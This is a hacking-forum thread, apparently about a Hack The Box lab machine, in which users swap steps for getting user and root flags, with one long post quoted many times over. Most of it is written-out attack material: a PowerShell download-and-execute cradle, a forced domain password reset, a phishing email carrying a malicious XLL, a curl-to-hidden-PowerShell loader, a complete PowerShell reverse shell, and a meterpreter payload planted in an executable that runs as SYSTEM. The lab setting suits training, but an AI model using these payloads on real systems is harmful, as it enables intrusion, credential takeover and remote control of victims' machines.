Posts: 219
Threads: 14
Joined: Apr 2024
Jun 23, 2024, 11:02 PM
(This post was last modified: Jun 23, 2024, 11:54 PM by osamy7593.)
what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64
create a meterpreter standalonerunner.exe.exe
wget 10.10..x.x:8000/standalonerunner.exe -o standalonerunner.exe
set ur meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt c:\Users\Administrator\Desktop>more root.txt This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 5
Threads: 0
Joined: Jun 2024
Jun 24, 2024, 01:37 AM
(This post was last modified: Jun 24, 2024, 01:57 AM by r9967252.)
(Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64
create a meterpreter standalonerunner.exe.exe
wget 10.10..x.x:8000/standalonerunner.exe -o standalonerunner.exe
set ur meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt c:\Users\Administrator\Desktop>more root.txt
how did you figure out that d.matrix can set password of another identity?
(Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64
create a meterpreter standalonerunner.exe.exe
wget 10.10..x.x:8000/standalonerunner.exe -o standalonerunner.exe
set ur meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt c:\Users\Administrator\Desktop>more root.txt
how did you figure out that d.matrix can set password of another identity?
nvm, found from sharphound, the group Web Dev can force change password on jacob
Posts: 12
Threads: 0
Joined: Jun 2024
(Jun 23, 2024, 03:54 PM)gihimlek Wrote: (Jun 23, 2024, 09:03 AM)anon912039120 Wrote: (Jun 23, 2024, 09:00 AM)jimmyshoemacher Wrote: (Jun 23, 2024, 04:12 AM)bmoon10 Wrote: (Jun 23, 2024, 04:04 AM)gihimlek Wrote: Same ....
couple of things:
1.swaks that i've used and worked -
swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: ws" --body "check" --attach @ws.xll
2.powershell execution - made the rev shell work with addition of command in the xll example cpp file
system ("curl http://<IP>:<PORT>/revsh.ps1 | powershell -nop -W hidden -noni -ep bypass -f -");
revsh.ps1
$TCPClient = New-Object Net.Sockets.TCPClient('<IP>', <PORT>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
Replace <IP>,<PORT> with your IP, PORT
cheers
what did you use to make the xll file?
I tried using the HelloWorld and Octoberfest XLL_Phishing github repos to create the xll but I don't ever see any traffic on my http server
I used HelloWorld XLL (applied the necessary changes), modified xlAutoOpen to execute system("powershell -e ...") and that's it
What is the necessary change? I just inserted system("command") on the cpp and worked locally but not on the server
By changes I meant modifying project properties to compile using Excel 2013 SDK Libraries
Posts: 219
Threads: 14
Joined: Apr 2024
(Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64
create a meterpreter standalonerunner.exe.exe
wget 10.10..x.x:8000/standalonerunner.exe -o standalonerunner.exe
set ur meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt c:\Users\Administrator\Desktop>more root.txt
how did you figure out that d.matrix can set password of another identity?
(Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64
create a meterpreter standalonerunner.exe.exe
wget 10.10..x.x:8000/standalonerunner.exe -o standalonerunner.exe
set ur meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt c:\Users\Administrator\Desktop>more root.txt
how did you figure out that d.matrix can set password of another identity?
nvm, found from sharphound, the group Web Dev can force change password on jacob
yup This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 9
Threads: 0
Joined: Jun 2024
(Jun 23, 2024, 12:50 PM)jimmyshoemacher Wrote: (Jun 23, 2024, 11:43 AM)bmoon10 Wrote: (Jun 23, 2024, 11:32 AM)jimmyshoemacher Wrote: anyone know how to use the hMailServer creds once you get the password?
1. hMailServer administrator encrypted pass is not crackable but the sqlserver pass is.
2. you can download the hMailserver.sdf and use the right tools + password to login into the database
3. dump the SHA256 password hashes of mail account holders from the table
4. try to crack the SHA256 hash and with john / hashcat.
it might be a dead-end nevertheless exploring all the avenue is a good thing.
i tried using the sql creds everywhere but i don't gain access to anything, is it required to get the user flag? or is it all together just a dead end?
no it does not require its just a rabbit hole
Posts: 5
Threads: 0
Joined: Jun 2024
Jun 24, 2024, 02:38 AM
(This post was last modified: Jun 24, 2024, 02:41 AM by r9967252.)
(Jun 24, 2024, 02:05 AM)osamy7593 Wrote: (Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64
create a meterpreter standalonerunner.exe.exe
wget 10.10..x.x:8000/standalonerunner.exe -o standalonerunner.exe
set ur meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt c:\Users\Administrator\Desktop>more root.txt
how did you figure out that d.matrix can set password of another identity?
(Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64
create a meterpreter standalonerunner.exe.exe
wget 10.10..x.x:8000/standalonerunner.exe -o standalonerunner.exe
set ur meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt c:\Users\Administrator\Desktop>more root.txt
how did you figure out that d.matrix can set password of another identity?
nvm, found from sharphound, the group Web Dev can force change password on jacob
yup
thanks, then, how did you find the admin is running the standalonerunner.exe? can seem to find any schtasks or services
(Jun 24, 2024, 02:05 AM)osamy7593 Wrote: (Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64
create a meterpreter standalonerunner.exe.exe
wget 10.10..x.x:8000/standalonerunner.exe -o standalonerunner.exe
set ur meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt c:\Users\Administrator\Desktop>more root.txt
how did you figure out that d.matrix can set password of another identity?
(Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64
create a meterpreter standalonerunner.exe.exe
wget 10.10..x.x:8000/standalonerunner.exe -o standalonerunner.exe
set ur meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt c:\Users\Administrator\Desktop>more root.txt
how did you figure out that d.matrix can set password of another identity?
nvm, found from sharphound, the group Web Dev can force change password on jacob
yup
nvm again, found it "C:\app development\kbfiltr> type README.md"
Posts: 219
Threads: 14
Joined: Apr 2024
readme.md file tell that This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 196
Threads: 31
Joined: Apr 2024
Jun 24, 2024, 03:54 AM
(This post was last modified: Jun 24, 2024, 03:56 AM by maggi.)
(Jun 24, 2024, 03:15 AM)osamy7593 Wrote: readme.md file tell that
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as
SYSTEM to test and debug this driver in a standalone environment**
what if that file was replaced or modified in some way to become evil?
Posts: 8
Threads: 0
Joined: Jun 2024
(Jun 23, 2024, 10:11 PM)osamy7593 Wrote: guys what for user flag
(Jun 23, 2024, 05:55 PM)maggi Wrote: (Jun 23, 2024, 10:54 AM)game95 Wrote: (Jun 23, 2024, 07:11 AM)maggi Wrote: (Jun 23, 2024, 06:32 AM)ritualist Wrote: Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me
$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
Good looks I didn't think of that!
I knew it was a link but I always forget I can share a share
What is a payload of evil.exe could you share pls?
evil.exe is just a quickie placeholder name I use for msf payloads
windows/x64/meterpreter/reverse_tcp
bro this after gaining shell as whom?
wasn't working, the payload always got killed:
[*] Started reverse TCP handler on 10.10.16.20:1133
[*]Sending stage (175686 bytes) to 10.10.11.21
[*]10.10.11.21 - Meterpreter session 4 closed. Reason: Died
[-] Meterpreter session 4 is not valid and will be closed
Posts: 49
Threads: 1
Joined: Jun 2024
(Jun 23, 2024, 10:12 PM)Liy4 Wrote: i'm stucked with getting rev shell. I use
swaks --to accounts@axlle.htb --from root@test.htb --body "Shell" --header "Subject: Help me Breach the System" --attach shell.xll --server axlle.htb
but didnt get the rev shell  . What is the error??
most likely the issue with the shell.xll. make sure to check the working xll in your local machine before deploying it with htb machine. if it works in local setup but not with htb then try changing the htb vpn server.
|
